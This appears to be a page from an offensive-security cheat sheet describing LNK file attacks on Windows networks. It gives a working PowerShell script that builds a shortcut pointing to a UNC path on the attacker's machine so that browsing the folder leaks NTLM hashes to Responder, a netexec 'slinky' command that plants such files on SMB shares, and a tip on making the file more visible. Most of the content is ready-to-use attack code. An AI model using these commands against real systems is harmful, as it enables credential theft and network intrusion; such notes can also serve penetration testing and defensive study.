search

linkLNK File Attacks

An LNK file attack is a way to get hashes by having a file visible in file explorer. The link path is set to a non-existent png on the attacker machine - trying to access this is what passes the hash.

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\[lhost]\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

  • Run responder, once the file is in view in the file explorer, the hash will be shown

  • can be a good idea to rename the file with an @ or ~ prefix so the file goes to the top of the list and is visible when the folder is opened

hashtag
Netexec

netexec smb [target] -d [domain] -u [user] -p [password] -M slinky -o NAME=[filename] SERVER=[lhost]

hashtag
Other options

https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.rtf

PreviousToken ImpersonationNextGPP/cPassword Attacks

Last updated